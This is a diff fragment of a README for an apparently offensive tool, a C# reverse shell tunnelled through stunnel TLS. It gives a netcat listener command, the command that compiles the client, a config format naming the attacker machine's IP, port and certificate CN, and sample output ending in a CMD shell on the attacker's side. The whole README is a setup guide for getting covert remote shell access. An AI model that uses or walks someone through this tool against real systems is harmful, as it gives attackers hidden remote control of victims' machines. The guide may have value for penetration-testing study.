zinzloun/STunnell_RevShell/README.md

 	nc -lvp 6666

 ## Compile the client:
+Youn can compile the client as follows:

 	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Program.cs

-	finally we can execute the client file ReverseShell2_SSL.exe the configuration file (config) must be present in the same directory of the exe, configurated according to the attacker machine: ip:<attacker machine IP>
+The configuration file (config) must be present in the same directory of the executable file and must contain the following information:

+		ip:<attacker machine IP>
 		port:<listen stunnel port on the attacker machine>
 		CN:<CN name as set on the stunnel certificate>

-	we should read the following on the CMD program shell
+Executing Program.exe we should read the following on the shell

 		Starting decoding, please wait...
 		Certificate revocation list checked: False
-		Remote cert was issued to CN=zinzloun, OU=IT Sec, O=Umbrella Corp., L=Chianti, S=Italy, C=IT and is valid from 20/07/2019 11:29:08 until 19/07/2022 11:29:08.
+		...
+The you shoud get a CMD shell on the attacker